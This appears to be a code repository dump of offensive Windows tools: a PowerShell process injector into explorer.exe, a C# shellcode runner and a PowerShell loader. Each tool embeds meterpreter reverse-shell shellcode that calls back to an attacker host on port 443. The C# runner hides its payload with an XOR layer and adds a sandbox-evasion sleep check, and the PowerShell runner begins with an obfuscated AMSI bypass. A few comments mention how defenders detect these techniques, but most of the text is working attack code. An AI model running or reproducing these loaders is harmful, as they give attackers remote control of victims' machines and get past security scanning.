20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.ps1:
--------------------------------------------------------------------------------
# Resolves the address of an exported native function without Add-Type or a compiled
# P/Invoke helper: finds the GAC-loaded System.dll, takes its non-public
# Microsoft.Win32.UnsafeNativeMethods type and invokes that type's GetModuleHandle and
# GetProcAddress wrappers through reflection.
#   $moduleName   - DLL whose export is wanted (e.g. kernel32.dll)
#   $functionName - export name; returns the IntPtr address
# Defender note: this reflective pattern leaves no helper assembly on disk, but the script
# text itself is still subject to PowerShell Script Block Logging (Event ID 4104) and AMSI.
function LookupFunc {
    Param ($moduleName, $functionName)
    # Select the GAC assembly whose file name is System.dll and grab the internal type.
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
        Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    # Collect every method named GetProcAddress and use the first one found.
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    # GetProcAddress(GetModuleHandle($moduleName), $functionName)
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
        @($moduleName)), $functionName))
}
11 |
# Builds, in an in-memory dynamic assembly, a delegate type whose Invoke takes the
# parameter types in $func and returns $delType. Combined with
# [Marshal]::GetDelegateForFunctionPointer this lets the script call a raw function
# pointer obtained from LookupFunc.
#   $func    - array of parameter types of the native function (mandatory)
#   $delType - return type; defaults to [Void]
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    # Dynamic assembly 'ReflectedDelegate' / module 'InMemoryModule' (Run access only,
    # nothing is saved to disk); the type derives from System.MulticastDelegate.
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
        [System.MulticastDelegate])
    # Runtime-implemented constructor and Invoke, as required for delegate types.
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}
32 |
# Injection target: PID of explorer.exe (the same default the C# Program.cs in this
# project uses when it is not elevated).
$procId = (Get-Process explorer).Id
34 |
35 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f ps1
36 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,0x52,0x20,0x56,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x41,0x51,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x44,0x8b,0x40,0x20,0x8b,0x48,0x18,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58
,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
37 |
# Each "C#:" line quotes the equivalent P/Invoke call from Program.cs in this project.
# Constants used below: 0x001F0FFF = PROCESS_ALL_ACCESS, 0x3000 = MEM_COMMIT|MEM_RESERVE,
# 0x40 = PAGE_EXECUTE_READWRITE. Unlike the C# build, $buf is written as-is (no XOR layer).
# Defender note: the chain OpenProcess(full access) -> remote RWX allocation ->
# WriteProcessMemory -> CreateRemoteThread into explorer.exe is what Sysmon Event IDs 10
# and 8 are typically tuned for. None of the return values is checked.

# C#: IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, procId);
$hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
    (getDelegateType @([UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke(0x001F0FFF, 0, $procId)

# C#: IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
$expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx),
    (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40)

# C#: bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);
$procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory),
    (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr])([Bool]))).Invoke($hProcess, $expAddr, $buf, [Uint32]$buf.Length, [IntPtr]::Zero)

# C#: IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread),
    (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero)

Write-Host "Injected! Check your listener!"
--------------------------------------------------------------------------------
/Shellcode Process Injector/Shellcode Process Injector.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Injector", "Shellcode Process Injector.csproj", "{E08BAA9C-9D20-4C9A-8933-EC567F39F54C}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.ActiveCfg = Debug|x64
19 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Debug|x64.Build.0 = Debug|x64
20 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.ActiveCfg = Release|x64
21 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|Any CPU.Build.0 = Release|x64
22 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.ActiveCfg = Release|x64
23 | {E08BAA9C-9D20-4C9A-8933-EC567F39F54C}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {04F2AB2E-4DA3-43DF-86FE-736580CBA9D4}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Program.cs:
--------------------------------------------------------------------------------
1 | using System.Runtime.InteropServices;
2 | using System;
3 |
4 | namespace rev
5 | {
6 | public class Program
7 | {
8 | public const uint EXECUTEREADWRITE = 0x40;
9 | public const uint COMMIT_RESERVE = 0x3000;
10 |
11 | [DllImport("kernel32.dll")]
12 | static extern void Sleep(uint dwMilliseconds);
13 |
14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
15 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
16 |
17 | [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
18 | private unsafe static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, uint lpThreadId);
19 |
20 | [DllImport("kernel32.dll", SetLastError = true)]
21 | public static extern Int32 WaitForSingleObject(IntPtr Handle, Int32 Wait);
22 |
23 | public static void Main()
24 | {
25 |
26 | DateTime t1 = DateTime.Now;
27 | Sleep(10000);
28 | double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
29 | if (deltaT < 9.5)
30 | {
31 | return;
32 | }
33 |
34 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
35 | // XORed with key 0xfa
36 | byte[] buf = new byte[511] {
37 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
38 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
39 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
40 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
41 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
42 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
43 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
44 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
45 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
46 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
47 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
48 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
49 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
50 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
51 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
52 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
53 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
54 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
55 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
56 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
57 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
58 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
59 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
60 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
61 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
62 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
63 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
64 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
65 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
66 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
67 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
68 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
69 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
70 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
71 | 0x2f
72 | };
73 | int payloadSize = buf.Length;
74 | IntPtr payAddr = VirtualAlloc(IntPtr.Zero, payloadSize, COMMIT_RESERVE, EXECUTEREADWRITE);
75 | for (int i = 0; i < buf.Length; i++)
76 | {
77 | buf[i] = (byte)((uint)buf[i] ^ 0xfa);
78 | }
79 | Marshal.Copy(buf, 0, payAddr, payloadSize);
80 | IntPtr payThreadId = CreateThread(IntPtr.Zero, 0, payAddr, IntPtr.Zero, 0, 0);
81 | int waitResult = WaitForSingleObject(payThreadId, -1);
82 | }
83 | }
84 | }
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Simple Shellcode Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Simple Shellcode Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1659e645-27b0-4ab9-a10e-64ba4b801cb0")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {1659E645-27B0-4AB9-A10E-64BA4B801CB0}
8 | Exe
9 | Simple_Shellcode_Runner
10 | Simple Shellcode Runner
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | true
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | true
36 |
37 |
38 | true
39 | bin\x64\Debug\
40 | DEBUG;TRACE
41 | true
42 | full
43 | x64
44 | 7.3
45 | prompt
46 | true
47 |
48 |
49 | bin\x64\Release\
50 | TRACE
51 | true
52 | true
53 | pdbonly
54 | x64
55 | 7.3
56 | prompt
57 | true
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/Simple Shellcode Runner/Simple Shellcode Runner.ps1:
--------------------------------------------------------------------------------
1 | # Compact AMSI bypass
2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
3 |
4 | # Shellcode loader >:]
5 | function LookupFunc {
6 | Param ($moduleName, $functionName)
7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
10 | $tmp=@()
11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
13 | @($moduleName)), $functionName))
14 | }
15 |
16 | function getDelegateType {
17 | Param (
18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
19 | [Parameter(Position = 1)] [Type] $delType = [Void]
20 | )
21 | $type = [AppDomain]::CurrentDomain.
22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
24 | DefineDynamicModule('InMemoryModule', $false).
25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
26 | [System.MulticastDelegate])
27 | $type.
28 | DefineConstructor('RTSpecialName, HideBySig, Public',
29 | [System.Reflection.CallingConventions]::Standard, $func).
30 | SetImplementationFlags('Runtime, Managed')
31 | $type.
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
33 | SetImplementationFlags('Runtime, Managed')
34 | return $type.CreateType()
35 | }
36 |
37 | # Allocate executable memory
38 | $lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
39 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
40 |
41 | # Copy shellcode to allocated memory
42 | # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f powershell
43 | [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0x50,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x48,0x1,0xd0,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58
,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
45 |
46 | # Execute shellcode and wait for it to exit
